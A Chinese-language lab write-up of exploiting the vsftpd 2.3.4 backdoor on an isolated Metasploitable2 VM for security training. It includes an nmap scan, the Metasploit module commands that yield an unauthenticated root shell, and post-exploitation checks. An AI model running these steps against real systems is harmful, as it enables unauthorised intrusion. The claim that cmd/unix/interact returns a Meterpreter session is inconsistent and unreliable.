在 Metasploitable2 上利用 vsftpd 2.3.4 后门(CVE-2011-2523)——一篇涵盖侦察、漏洞利用与修复的实战渗透测试实验记录。
一个动手实验,演示在隔离的 Kali Linux ↔ Metasploitable2 环境中,发现并利用 vsftpd 2.3.4 中一个已知后门漏洞的完整过程。
针对一台刻意留有漏洞的目标机器,练习渗透测试的核心工作流程——信息收集、漏洞识别、漏洞利用与后渗透验证。
| 组件 | 详情 |
|---|---|
| 攻击机 | Kali Linux 2026.1 (VMware) |
| 目标机 | Metasploitable2 (VMware) |
| 网络 | NAT,与宿主机/互联网隔离 |
| 目标 IP | 192.168.233.129 |
两台虚拟机均置于同一私有网段,并与真实网络隔离,以确保本次练习不存在任何外部暴露。
nmap -sV -sC 192.168.233.129
对目标进行开放端口和服务版本扫描。结果包括:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
...

端口 21 运行的是 vsftpd 2.3.4。该特定版本在公开领域已知存在后门:2011 年,官方 vsftpd 源码压缩包被入侵并植入了恶意代码。使用包含 :) 字符串的用户名登录,会触发 TCP 6200 端口上的隐藏监听器,从而获得一个无需认证的远程 Shell。
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run
该漏洞利用成功触发了后门,并返回了一个 Meterpreter 会话。

sessions -i 1
sysinfo
getuid
确认了受害主机上的活动会话及访问权限级别。


通过利用一个过时且被植入后门的服务,无需任何认证便获得了目标机器的完整 root 级远程 Shell 访问权限。
一个存在已知公开漏洞的过时服务,就足以导致系统被完全渗透——无需开发自定义漏洞利用代码,也无需高级技术。这凸显了补丁管理和版本卫生为何是现实世界安全态势的根基。
本次练习仅在 Metasploitable2 上进行,这是一台为安全培训特意设计、刻意留有漏洞的虚拟机,并且整个实验在隔离的实验室网络中进行,与生产系统或任何第三方基础设施均无连接。